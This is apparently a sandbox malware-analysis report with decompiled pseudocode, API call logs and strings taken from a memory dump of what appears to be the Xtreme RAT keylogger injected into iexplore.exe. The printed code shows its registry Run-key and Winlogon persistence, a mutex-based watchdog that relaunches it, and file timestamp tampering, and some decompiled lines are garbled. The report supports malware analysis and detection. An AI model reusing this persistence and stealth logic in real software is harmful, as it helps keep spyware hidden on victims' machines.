Part of subcall function 00C853EC: RegCloseKey.ADVAPI32(?,?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00C8548A

Part of subcall function 00C81B78: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85084, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37
file

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E00C85084(void* __eax, unsigned int __ecx, void* __edx, struct _OVERLAPPED* _a4, DWORD* _a8) {
				int _t10;
				void* _t16;
				void* _t21;
				long _t23;

				_t23 = __ecx;
				_t16 = __edx;
				_t21 = __eax;
				_push(0);
				E00C82B3C(__edx, __ecx >> 1);
				_t10 = WriteFile(_t21, _t16, _t23, _a8, _a4); // executed
				_push(0);
				E00C82B3C(_t16, _t23 >> 1);
				return _t10;
			}

0x00c8508a
0x00c8508c
0x00c8508e
0x00c85096
0x00c8509a
0x00c850aa
0x00c850b7
0x00c850bb
0x00c850c6

APIs

WriteFile.KERNEL32(000000D0,?,00000002,?,?), ref: 00C850AA

Strings

XtremeKeylogger, xrefs: 00C85087

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C836D8, Relevance: 2.6, APIs: 2, Instructions: 72

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00C836D8(void* __eax, void* __eflags) {
				void* _t3;
				void* _t6;
				void* _t15;
				void* _t25;
				void* _t33;
				void* _t35;
				void* _t52;

				_t35 = __eax;
				_t3 = E00C836A8(__eax, 0x5c, __eflags);
				_t56 = _t3 + 1;
				if(_t3 + 1 != 0) {
					L2:
					_t6 = E00C836A8(_t35, 0x5c, _t57);
					_t58 = _t6 + 1;
					if(_t6 + 1 == 0) {
						__eflags = E00C836A8(_t35, 0x2f, __eflags) + 1;
						if(__eflags != 0) {
							_t15 = VirtualAlloc(0, E00C836A8(_t35, 0x2f, __eflags) + _t13, 0x1000, 4);
							__eflags = E00C836A8(_t35, 0x2f, __eflags) + _t17;
							E00C82914(_t15, _t35);
							_t52 = E00C833A8(_t15, 0xc837ac, E00C836A8(_t35, 0x2f, __eflags) + _t17);
						}
					} else {
						_t25 = VirtualAlloc(0, E00C836A8(_t35, 0x5c, _t58) + _t23, 0x1000, 4); // executed
						E00C836A8(_t35, 0x5c, _t58);
						E00C82914(_t25, _t35);
						_t52 = E00C833A8(_t25, E00C837A8, _t58);
					}
					L6:
					return _t52;
				}
				_t33 = E00C836A8(_t35, 0x2f, _t56);
				_t57 = _t33 + 1;
				if(_t33 + 1 == 0) {
					goto L6;
				}
				goto L2;
			}

APIs

VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C83721
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C83775

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C8263C, Relevance: 1.5, APIs: 1, Instructions: 14

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E00C8263C(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, WCHAR* _a12) {
				void* _t8;

				_t4 = _a12;
				asm("sbb eax, eax");
				_t8 = CreateMutexW(_a4,  &(_a12[0]) & 0x0000007f, _t4); // executed
				return _t8;
			}

0x00c8263f
0x00c82647
0x00c82652
0x00c82658

APIs

CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C833A8, Relevance: 1.3, APIs: 1, Instructions: 50

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E00C833A8(void* __eax, void* __edx, void* __eflags) {
				void* _t3;
				void* _t8;
				void* _t17;
				void* _t23;
				void* _t34;
				void* _t35;
				intOrPtr* _t36;

				_t35 = __edx;
				_t23 = __eax;
				_t3 = E00C82E48(__eax);
				_t8 = VirtualAlloc(0, _t3 + _t3 + E00C82E48(_t35) + _t5, 0x1000, 4); // executed
				_t34 = _t8;
				E00C82E48(_t23);
				E00C82914(_t34, _t23);
				_push(E00C82E48(_t35) + _t14);
				_t17 = E00C82E48(_t23);
				_push(0);
				_push(_t17 + _t17);
				asm("cdq");
				asm("adc edx, [esp+0x4]");
				E00C82914(_t34 +  *_t36, _t35);
				return _t34;
			}

0x00c833ab
0x00c833ad
0x00c833b1
0x00c833d1
0x00c833d6
0x00c833da
0x00c833e7
0x00c833f5
0x00c833f8
0x00c83401
0x00c83402
0x00c83405
0x00c83409
0x00c83413
0x00c8341d

APIs

VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Non-executed Functions

Function 00C88ECC, Relevance: 70.5, APIs: 23, Strings: 17, Instructions: 457
librarysleepfileCrypto

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E00C88ECC(intOrPtr _a4) {
				void* _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int* _t92;
				signed int _t93;
				void* _t160;
				void* _t182;
				intOrPtr* _t302;
				void* _t303;
				void* _t304;
				void* _t305;
				void* _t306;
				void* _t309;
				void* _t323;
				intOrPtr _t328;
				intOrPtr _t331;
				long _t358;
				void* _t360;
				void* _t361;
				intOrPtr _t362;

				asm("das");
				 *_t92 = _t92 +  *_t92;
				 *((intOrPtr*)(_t92 + _t92)) =  *((intOrPtr*)(_t92 + _t92)) + _t323;
				 *_t92 = _t92 +  *_t92;
				 *[cs:esi] =  *[cs:esi] + _t92;
				if ( *[cs:esi] != 0) goto L1;
				asm("outsb");
				 *_t302 =  *_t302 + _t92;
				if ( *_t302 == 0) goto L2;
				_t93 =  *_t92 * 0x6e006f;
				if (_t93 >= 0) goto L3;
				 *_t93 =  *_t93 + _t93;
				 *_t93 =  *_t93 + _t93;
				asm("outsd");
				 *_t93 =  *_t93 + _t323;
				 *[gs:esi] =  *[gs:esi] + _t305;
				 *_t93 =  *_t93 + _t93;
				 *_t93 =  *_t93 + _t93;
				_t360 = _t361;
				_t362 = _t361 + 0xffffffe8;
				_push(_t302);
				LoadLibraryA("user32.dll");
				LoadLibraryA("advapi32.dll");
				LoadLibraryA("shell32.dll");
				LoadLibraryA("shlwapi.dll");
				LoadLibraryA("kernel32.dll");
				_v8 = 0;
				E00C8263C(0, 0, _a4 + 0x135e);
				_t303 = CreateFileW(_a4 + 0x181c, 0x80000000, 1, 0, 3, 0, 0);
				if(_t303 != 0xffffffff) {
					_v20 = GetFileSize(_t303, 0);
					_v16 = 0;
					_t358 = _v20;
					_v8 = VirtualAlloc(0, _t358, 0x1000, 4);
					SetFilePointer(_t303, 0, 0, 0);
					ReadFile(_t303, _v8, _t358,  &_v12, 0);
				}
				CloseHandle(_t303);
				_v12 = 0;
				Sleep(0x2710);
				_v24 = E00C833A8(_a4 + 0x181c, L" restart", _a4 + 0x181c);
				_v28 = E00C833A8(L"explorer.exe ", _a4 + 0x181c, _a4 + 0x181c);
				L6:
				while(1) {
					if( *((char*)(_a4 + 0x1258)) == 1) {
						if( *((char*)(_a4 + 0x12d8)) == 1) {
							E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 2, E00C82E48(_a4 + 0x181c) + _t291, 0, _a4 + 0x181c);
						}
						if( *((char*)(_a4 + 0x12d9)) == 1) {
							E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 2, E00C82E48(_a4 + 0x181c) + _t282, 0, _a4 + 0x181c);
						}
						if( *((char*)(_a4 + 0x12da)) == 1) {
							SHDeleteKeyW(0x80000001, _a4 + 0x1e3a);
							E00C888D0(0x80000002, _a4 + 0x1e3a, 2, E00C82E48(_v24) + _t273, 0, _v24);
						}
						if( *((char*)(_a4 + 0x12f2)) == 1) {
							if( *((char*)(_a4 + 0x12f3)) == 1) {
								E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 2, E00C82E48(_a4 + 0x181c) + _t254, 0, _a4 + 0x181c);
								E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 2, E00C82E48(_a4 + 0x181c) + _t263, 0, _a4 + 0x181c);
							}
							if( *((char*)(_a4 + 0x12f4)) == 1) {
								E00C888D0(0x80000001, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 2, E00C82E48(_a4 + 0x181c) + _t238, 0, _a4 + 0x181c);
								E00C888D0(0x80000002, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 2, E00C82E48(_a4 + 0x181c) + _t246, 0, _a4 + 0x181c);
							}
							if( *((char*)(_a4 + 0x12f5)) == 1) {
								E00C888D0(0x80000001, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 2, E00C82E48(_v28) + _t224, 0, _v28);
								E00C888D0(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 2, E00C82E48(_v28) + _t230, 0, _v28);
							}
							if( *((char*)(_a4 + 0x12f6)) == 1) {
								E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", 2, E00C82E48(_a4 + 0x181c) + _t208, 0, _a4 + 0x181c);
								E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", 2, E00C82E48(_a4 + 0x181c) + _t217, 0, _a4 + 0x181c);
							}
						}
					}
					if(E00C835B0(_a4 + 0x181c) != 0 || E00C834C4(_a4 + 0x1a26) == 0) {
						L33:
						_t304 = E00C8263C(0, 0, _a4 + 0x1310);
						if(GetLastError() == 0xb7) {
							CloseHandle(_t304);
						} else {
							CloseHandle(_t304);
							ShellExecuteW(0, L"open", _a4 + 0x181c, 0, 0, 0);
						}
						_t303 = E00C8263C(0, 0, _a4 + 0x1326);
						if(GetLastError() != 0xb7) {
							CloseHandle(_t303);
						} else {
							ExitProcess(0);
						}
						Sleep(0x1388);
						continue;
					} else {
						if(_v16 != 0) {
							if(__eflags <= 0) {
								L29:
								if( *((char*)(_a4 + 0x1235)) != 1) {
									goto L33;
								}
								SetFileAttributesW(_a4 + 0x1a26, 0x80);
								SetFileAttributesW(_a4 + 0x181c, 0x80);
								E00C81248();
								_push(_t360);
								_push(0xc89399);
								_push( *[fs:eax]);
								 *[fs:eax] = _t362;
								_push(E00C812A4(0x1b) + 1);
								_push(E00C812A4(0xa) + 1);
								_push(E00C812A4(0xa) + 1);
								_push(E00C812A4(0xa) + 1);
								_push(E00C812A4(0xb) + 1);
								_t160 = E00C812A4(6);
								_pop(_t306);
								E00C83BC4(_a4 + 0x1a26, _t303, _t306, _t160 + 0x7d1);
								_pop(_t328);
								 *[fs:eax] = _t328;
								_push(_t360);
								_push(0xc89416);
								_push( *[fs:eax]);
								 *[fs:eax] = _t362;
								_push(E00C812A4(0x1b) + 1);
								_push(E00C812A4(0xa) + 1);
								_push(E00C812A4(0xa) + 1);
								_push(E00C812A4(0xa) + 1);
								_push(E00C812A4(0xb) + 1);
								_t182 = E00C812A4(6);
								_pop(_t309);
								E00C83BC4(_a4 + 0x181c, _t303, _t309, _t182 + 0x7d1);
								_pop(_t331);
								 *[fs:eax] = _t331;
								E00C83674(_a4 + 0x1a26);
								E00C83674(_a4 + 0x181c);
								goto L33;
							}
							L28:
							E00C83218(_a4 + 0x181c, _v8, _v20, _v16);
							goto L29;
						}
						if(_v20 <= 0) {
							goto L29;
						}
						goto L28;
					}
				}
			}

0x00c88ecc
0x00c88ecd
0x00c88ecf
0x00c88ed2
0x00c88ed4
0x00c88ed8
0x00c88eda
0x00c88edb
0x00c88ede
0x00c88ee0
0x00c88ee6
0x00c88ee8
0x00c88eea
0x00c88eec
0x00c88eed
0x00c88ef0
0x00c88ef4
0x00c88ef6
0x00c88ef9
0x00c88efb
0x00c88efe
0x00c88f06
0x00c88f10
0x00c88f1a
0x00c88f24
0x00c88f2e
0x00c88f35
0x00c88f45
0x00c88f67
0x00c88f6c
0x00c88f78
0x00c88f7b
0x00c88f85
0x00c88f90
0x00c88f9a
0x00c88fab
0x00c88fab
0x00c88fb1
0x00c88fb8
0x00c88fc0
0x00c88fd7
0x00c88fed
0x00000000
0x00c88ff0
0x00c88ffa
0x00c8900a
0x00c8903d
0x00c8903d
0x00c8904c
0x00c8907f
0x00c8907f
0x00c8908e
0x00c8909e
0x00c890ca
0x00c890ca
0x00c890d9
0x00c890e9
0x00c8911c
0x00c89152
0x00c89152
0x00c89161
0x00c89190
0x00c891c2
0x00c891c2
0x00c891d1
0x00c891f6
0x00c8921e
0x00c8921e
0x00c8922d
0x00c89260
0x00c89296
0x00c89296
0x00c8922d
0x00c890d9
0x00c892aa
0x00c8943a
0x00c8944c
0x00c89458
0x00c8947e
0x00c8945a
0x00c8945b
0x00c89476
0x00c89476
0x00c89495
0x00c894a1
0x00c894ad
0x00c894a3
0x00c894a5
0x00c894a5
0x00c894b7
0x00000000
0x00c892c5
0x00c892c9
0x00c892d3
0x00c892eb
0x00c892f5
0x00000000
0x00000000
0x00c89309
0x00c8931c
0x00c89321
0x00c89328
0x00c89329
0x00c8932e
0x00c89331
0x00c8933f
0x00c8934b
0x00c89357
0x00c89363
0x00c8936f
0x00c89375
0x00c89389
0x00c8938a
0x00c89391
0x00c89394
0x00c893a5
0x00c893a6
0x00c893ab
0x00c893ae
0x00c893bc
0x00c893c8
0x00c893d4
0x00c893e0
0x00c893ec
0x00c893f2
0x00c89406
0x00c89407
0x00c8940e
0x00c89411
0x00c89428
0x00c89435
0x00000000
0x00c89435
0x00c892d5
0x00c892e6
0x00000000
0x00c892e6
0x00c892cf
0x00000000
0x00000000
0x00000000
0x00c892d1
0x00c892aa

APIs

LoadLibraryA.KERNEL32(user32.dll), ref: 00C88F06
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C88F10
LoadLibraryA.KERNEL32(shell32.dll), ref: 00C88F1A
LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00C88F24
LoadLibraryA.KERNEL32(kernel32.dll), ref: 00C88F2E

Part of subcall function 00C8263C: CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C88F62
GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,?,kernel32.dll,shlwapi.dll,shell32.dll,advapi32.dll), ref: 00C88F71
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,?), ref: 00C88F8B
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00001000,00000004,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000), ref: 00C88F9A
ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 00C88FAB
CloseHandle.KERNEL32(00000000), ref: 00C88FB1
Sleep.KERNEL32(00002710,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,?,kernel32.dll,shlwapi.dll,shell32.dll,advapi32.dll), ref: 00C88FC0

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

SHDeleteKeyW.SHLWAPI(80000001,?), ref: 00C8909E

Part of subcall function 00C888D0: RegCreateKeyW.ADVAPI32(80000001,SOFTWARE\FakeMessage,?), ref: 00C888E0
Part of subcall function 00C888D0: RegSetValueExW.ADVAPI32(?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002,00000004), ref: 00C888F8
Part of subcall function 00C888D0: RegCloseKey.ADVAPI32(?,?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002), ref: 00C88907

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

Part of subcall function 00C834C4: lstrlenW.KERNEL32(00000000), ref: 00C834EB
Part of subcall function 00C834C4: CreateDirectoryW.KERNEL32(?,00000000,00000000), ref: 00C83583

SetFileAttributesW.KERNEL32(?,00000080), ref: 00C89309
SetFileAttributesW.KERNEL32(?,00000080,?,00000080), ref: 00C8931C

Part of subcall function 00C81248: GetSystemTime.KERNEL32(?), ref: 00C81252

Part of subcall function 00C83BC4: SystemTimeToFileTime.KERNEL32(?,?,00000000,00C83C74,?,00000000), ref: 00C83C0F
Part of subcall function 00C83BC4: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C20
Part of subcall function 00C83BC4: SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C51

Part of subcall function 00C83674: GetFileAttributesW.KERNEL32(00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C83678
Part of subcall function 00C83674: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C83688

Part of subcall function 00C83218: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00C83233
Part of subcall function 00C83218: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00C8E07C,?,00000000,?,?,00C89E6B,0000181C,00000000,00000000,00000000,00000080,00000000), ref: 00C83252
Part of subcall function 00C83218: WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00C83263
Part of subcall function 00C83218: CloseHandle.KERNEL32(00000000), ref: 00C8326F

GetLastError.KERNEL32(00000000,00000000,?), ref: 00C8944E
CloseHandle.KERNEL32(00000000), ref: 00C8945B
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C89476
CloseHandle.KERNEL32(00000000), ref: 00C8947E
GetLastError.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C89497
ExitProcess.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C894A5
CloseHandle.KERNEL32(00000000), ref: 00C894AD
Sleep.KERNEL32(00001388,00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C894B7

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00C89033, 00C89075
Software\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 00C89186, 00C891B8
kernel32.dll, xrefs: 00C88F29
shell32.dll, xrefs: 00C88F15
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, xrefs: 00C891EC, 00C89214
shlwapi.dll, xrefs: 00C88F1F
StubPath, xrefs: 00C890B7
restart, xrefs: 00C88FC5
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00C89112, 00C89148
user32.dll, xrefs: 00C88F01
.functions, xrefs: 00C88ED4
Load, xrefs: 00C89181, 00C891B3
Shell, xrefs: 00C891E7, 00C8920F
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run, xrefs: 00C89256, 00C8928C
open, xrefs: 00C8946F
explorer.exe , xrefs: 00C88FE3
advapi32.dll, xrefs: 00C88F0B

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C88EC4, Relevance: 67.0, APIs: 21, Strings: 17, Instructions: 456
librarysleepfileCrypto

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00C88EC4(intOrPtr _a4) {
				void* _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr* _t92;
				signed int* _t93;
				signed int _t94;
				void* _t161;
				void* _t183;
				intOrPtr* _t303;
				void* _t304;
				void* _t305;
				void* _t306;
				void* _t307;
				void* _t310;
				void* _t324;
				intOrPtr _t329;
				intOrPtr _t332;
				long _t359;
				void* _t361;
				void* _t362;
				intOrPtr _t363;

				 *_t92 =  *_t92 + _t92;
				_t93 = _t92 +  *_t92;
				 *_t93 = _t93 +  *_t93;
				asm("das");
				 *_t93 = _t93 +  *_t93;
				 *((intOrPtr*)(_t93 + _t93)) =  *((intOrPtr*)(_t93 + _t93)) + _t324;
				 *_t93 = _t93 +  *_t93;
				 *[cs:esi] =  *[cs:esi] + _t93;
				if ( *[cs:esi] != 0) goto L2;
				asm("outsb");
				 *_t303 =  *_t303 + _t93;
				if ( *_t303 == 0) goto L3;
				_t94 =  *_t93 * 0x6e006f;
				if (_t94 >= 0) goto L4;
				 *_t94 =  *_t94 + _t94;
				 *_t94 =  *_t94 + _t94;
				asm("outsd");
				 *_t94 =  *_t94 + _t324;
				 *[gs:esi] =  *[gs:esi] + _t306;
				 *_t94 =  *_t94 + _t94;
				 *_t94 =  *_t94 + _t94;
				_t361 = _t362;
				_t363 = _t362 + 0xffffffe8;
				_push(_t303);
				LoadLibraryA("user32.dll");
				LoadLibraryA("advapi32.dll");
				LoadLibraryA("shell32.dll");
				LoadLibraryA("shlwapi.dll");
				LoadLibraryA("kernel32.dll");
				_v8 = 0;
				E00C8263C(0, 0, _a4 + 0x135e);
				_t304 = CreateFileW(_a4 + 0x181c, 0x80000000, 1, 0, 3, 0, 0);
				if(_t304 != 0xffffffff) {
					_v20 = GetFileSize(_t304, 0);
					_v16 = 0;
					_t359 = _v20;
					_v8 = VirtualAlloc(0, _t359, 0x1000, 4);
					SetFilePointer(_t304, 0, 0, 0);
					ReadFile(_t304, _v8, _t359,  &_v12, 0);
				}
				CloseHandle(_t304);
				_v12 = 0;
				Sleep(0x2710);
				_v24 = E00C833A8(_a4 + 0x181c, L" restart", _a4 + 0x181c);
				_v28 = E00C833A8(L"explorer.exe ", _a4 + 0x181c, _a4 + 0x181c);
				L7:
				while(1) {
					if( *((char*)(_a4 + 0x1258)) != 1) {
						L23:
						if(E00C835B0(_a4 + 0x181c) != 0 || E00C834C4(_a4 + 0x1a26) == 0) {
							L34:
							_t305 = E00C8263C(0, 0, _a4 + 0x1310);
							if(GetLastError() == 0xb7) {
								CloseHandle(_t305);
							} else {
								CloseHandle(_t305);
								ShellExecuteW(0, L"open", _a4 + 0x181c, 0, 0, 0);
							}
							_t304 = E00C8263C(0, 0, _a4 + 0x1326);
							if(GetLastError() != 0xb7) {
								CloseHandle(_t304);
							} else {
								ExitProcess(0);
							}
							Sleep(0x1388);
							continue;
						} else {
							if(_v16 != 0) {
								if(__eflags <= 0) {
									L30:
									if( *((char*)(_a4 + 0x1235)) != 1) {
										goto L34;
									}
									SetFileAttributesW(_a4 + 0x1a26, 0x80);
									SetFileAttributesW(_a4 + 0x181c, 0x80);
									E00C81248();
									_push(_t361);
									_push(0xc89399);
									_push( *[fs:eax]);
									 *[fs:eax] = _t363;
									_push(E00C812A4(0x1b) + 1);
									_push(E00C812A4(0xa) + 1);
									_push(E00C812A4(0xa) + 1);
									_push(E00C812A4(0xa) + 1);
									_push(E00C812A4(0xb) + 1);
									_t161 = E00C812A4(6);
									_pop(_t307);
									E00C83BC4(_a4 + 0x1a26, _t304, _t307, _t161 + 0x7d1);
									_pop(_t329);
									 *[fs:eax] = _t329;
									_push(_t361);
									_push(0xc89416);
									_push( *[fs:eax]);
									 *[fs:eax] = _t363;
									_push(E00C812A4(0x1b) + 1);
									_push(E00C812A4(0xa) + 1);
									_push(E00C812A4(0xa) + 1);
									_push(E00C812A4(0xa) + 1);
									_push(E00C812A4(0xb) + 1);
									_t183 = E00C812A4(6);
									_pop(_t310);
									E00C83BC4(_a4 + 0x181c, _t304, _t310, _t183 + 0x7d1);
									_pop(_t332);
									 *[fs:eax] = _t332;
									E00C83674(_a4 + 0x1a26);
									E00C83674(_a4 + 0x181c);
									goto L34;
								}
								L29:
								E00C83218(_a4 + 0x181c, _v8, _v20, _v16);
								goto L30;
							}
							if(_v20 <= 0) {
								goto L30;
							}
							goto L29;
						}
					}
					if( *((char*)(_a4 + 0x12d8)) == 1) {
						E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 2, E00C82E48(_a4 + 0x181c) + _t292, 0, _a4 + 0x181c);
					}
					if( *((char*)(_a4 + 0x12d9)) == 1) {
						E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 2, E00C82E48(_a4 + 0x181c) + _t283, 0, _a4 + 0x181c);
					}
					if( *((char*)(_a4 + 0x12da)) == 1) {
						SHDeleteKeyW(0x80000001, _a4 + 0x1e3a);
						E00C888D0(0x80000002, _a4 + 0x1e3a, 2, E00C82E48(_v24) + _t274, 0, _v24);
					}
					if( *((char*)(_a4 + 0x12f2)) == 1) {
						if( *((char*)(_a4 + 0x12f3)) == 1) {
							E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 2, E00C82E48(_a4 + 0x181c) + _t255, 0, _a4 + 0x181c);
							E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 2, E00C82E48(_a4 + 0x181c) + _t264, 0, _a4 + 0x181c);
						}
						if( *((char*)(_a4 + 0x12f4)) == 1) {
							E00C888D0(0x80000001, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 2, E00C82E48(_a4 + 0x181c) + _t239, 0, _a4 + 0x181c);
							E00C888D0(0x80000002, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 2, E00C82E48(_a4 + 0x181c) + _t247, 0, _a4 + 0x181c);
						}
						if( *((char*)(_a4 + 0x12f5)) == 1) {
							E00C888D0(0x80000001, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 2, E00C82E48(_v28) + _t225, 0, _v28);
							E00C888D0(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 2, E00C82E48(_v28) + _t231, 0, _v28);
						}
						if( *((char*)(_a4 + 0x12f6)) == 1) {
							E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", 2, E00C82E48(_a4 + 0x181c) + _t209, 0, _a4 + 0x181c);
							E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", 2, E00C82E48(_a4 + 0x181c) + _t218, 0, _a4 + 0x181c);
						}
					}
					goto L23;
				}
			}

0x00c88ec6
0x00c88ec8
0x00c88eca
0x00c88ecc
0x00c88ecd
0x00c88ecf
0x00c88ed2
0x00c88ed4
0x00c88ed8
0x00c88eda
0x00c88edb
0x00c88ede
0x00c88ee0
0x00c88ee6
0x00c88ee8
0x00c88eea
0x00c88eec
0x00c88eed
0x00c88ef0
0x00c88ef4
0x00c88ef6
0x00c88ef9
0x00c88efb
0x00c88efe
0x00c88f06
0x00c88f10
0x00c88f1a
0x00c88f24
0x00c88f2e
0x00c88f35
0x00c88f45
0x00c88f67
0x00c88f6c
0x00c88f78
0x00c88f7b
0x00c88f85
0x00c88f90
0x00c88f9a
0x00c88fab
0x00c88fab
0x00c88fb1
0x00c88fb8
0x00c88fc0
0x00c88fd7
0x00c88fed
0x00000000
0x00c88ff0
0x00c88ffa
0x00c8929b
0x00c892aa
0x00c8943a
0x00c8944c
0x00c89458
0x00c8947e
0x00c8945a
0x00c8945b
0x00c89476
0x00c89476
0x00c89495
0x00c894a1
0x00c894ad
0x00c894a3
0x00c894a5
0x00c894a5
0x00c894b7
0x00000000
